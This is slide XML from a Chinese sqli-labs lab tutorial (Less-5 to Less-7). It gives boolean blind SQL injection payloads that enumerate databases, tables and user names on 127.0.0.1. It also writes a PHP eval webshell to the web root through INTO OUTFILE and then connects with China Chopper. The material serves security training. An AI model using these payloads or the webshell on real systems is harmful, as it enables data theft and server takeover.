              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>此时返回 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>you are in…….</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>代表执行成功。</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425932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60218"/>
            <a:ext cx="10131425" cy="318655"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-5 bool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-2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800" dirty="0"/>
              <a:t>完整注入流程：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1. http://127.0.0.1/sqli/Less-5/?id=1’ and  ascii(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>((select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>schema_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>information_schema.schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> limit 1,1),1,1)) &gt;100--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>通过二分法猜解得到所有的库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>红色为可变参数。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2. http://127.0.0.1/sqli/Less-5/?id=1’ and ascii(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a: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1,1),1,1))&gt;1--+  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>再次通过二分法可猜解得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>下的所有表。其中，红色为可变参数。</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limit 1,1),1,1)) &gt;1 --+  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>通过二分法可猜解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>内的字段，其中红色为可变参数。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>4.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username from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>security.users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> limit 1,1),1,1))&gt;1--+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>继续猜解即可得到字段内的值。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="317022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10052" y="360218"/>
            <a:ext cx="10131425" cy="318655"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-6</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900" dirty="0"/>
              <a:t>完整注入流程：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>1. http://127.0.0.1/sqli/Less-5/?id=1” and  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1,1),1,1)) &gt;100--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>通过二分法猜解得到所有的库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>红色为可变参数。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>2. http://127.0.0.1/sqli/Less-5/?id=1”and ascii(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>((select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>=0x7365637572697479 limit 1,1),1,1))&gt;1--+  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>再次通过二分法可猜解得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>下的所有表。其中，红色为可变参数。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>3. http://127.0.0.1/sqli/Less-5/?id=1” and ascii(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>((select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0" err="1"/>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>=0x7573657273 limit 1,1),1,1)) &gt;1 --+  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>通过二分法可猜解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>内的字段，其中红色为可变参数。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>4. http://127.0.0.1/sqli/Less-5/?id=1”and ascii(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>((select username from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0" err="1"/>
              <a:t>security.users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t> limit 1,1),1,1))&gt;1--+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>继续猜解即可得到字段内的值。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="155303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F9EB-16B8-4E04-97BE-4022405F7CCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1849581" y="416690"/>
            <a:ext cx="8492837" cy="303746"/>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26E4584-4E44-4961-AC19-E68C0269EAD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="900545"/>
            <a:ext cx="10841181" cy="5540765"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>1. show variables like '%secure%';</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>查看 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>secure-file-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0" err="1"/>
              <a:t>priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>当前的值，如果显示为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>，则需要打开</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>C:\phpstudy\PHPTutorial\MySQL\my.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>文件，在其中加上一句：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0" err="1"/>
              <a:t>secure_file_priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>=“/”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>一句话木马：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>版本：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>&lt;?php @eval($_POST[“crow”]);?&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>其中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>crow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>是密码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>补充：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0" err="1"/>
              <a:t>load_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>()  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>读取本地文件  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0" err="1"/>
              <a:t>load_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>('C:\\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en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>4. into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0" err="1"/>
              <a:t>outfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>写文件                                        用法：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t> select '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t> is very good' into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0" err="1"/>
              <a:t>outfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t> 'test1.txt‘;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>                                                                              文件位置： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>C:\phpstudy\PHPTutorial\MySQL\data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>或者是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>select 'crow 666' into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0" err="1"/>
              <a:t>outfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t> 'C:\\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zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>文件位置：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t> C:\phpstudy\PHPTutorial\WWW\sqli\Less-7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>注意事项： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>\\</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17975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FF2B-C52C-46C9-9003-FB2B57B790BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2060575" y="215798"/>
            <a:ext cx="10131425" cy="401782"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-7</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F77FFF31-A5B2-44E0-A90F-FE7DB81F36CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="1360449"/>
            <a:ext cx="11000677" cy="5080862"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1. http://127.0.0.1/sqli/Less-7/?id=1‘)) order by 3--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>查看有多少列</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2. http://127.0.0.1/sqli/Less-7/?id=-1‘)) union select 1,2,’&lt;?php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sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>\\Less-7\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>test.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>” --+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>将一句话木马写入其中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>使用中国菜刀访问即可！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="132268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A1900-2456-403D-969D-91E8EF77A7F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1891146" y="387929"/>
            <a:ext cx="10131425" cy="263236"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>目的</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05FC0B54-2B24-4110-90DE-A56DAC55F4F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="651165"/>
            <a:ext cx="12192001" cy="6068290"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>首先是免费的！！！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>         我接触这个安全这个领域已经有一段时间了，总体上来说，是因为一次偶然的经历，虽说是接触，实际上我本身并没有真正的认真学习过，我逐渐感觉到自己有一种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>never get anywhere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>（一事无成），中间我也遇到过很多的大牛，包括我的大学室友也给了我很大的帮助。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>      我从最初的信息安全到后来的机器学习，都学得一塌糊涂，慢慢我开始找到了方向，我发现自己可能真的是不适合机器学习，在我看来机器学习几乎近似等于数学，这里就不再说了。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>-labs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>是由印度人写的，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>-labs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>天书已经存在很久了，但是为什么我还要做这个视频？这可能和我的浮躁的学习缺点有关，我一般来说，对于比较难理解的东西，我喜欢使用一些巧妙的方法或者是看视频，初次接触的难的东西都会有抵触的心理，所以我做这个也不在乎你能不能完全看完，你完全可以在你刚接触这个的时候，当做</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>极其简单的甚至可能有错误的参考资料，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>如果能够给予你一点点的帮助，那我认为这就是值得的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>    希望你能从我这里得到你想要的，如果有机会的话，我还会继续更新下去。。。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>   2019.11.19</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
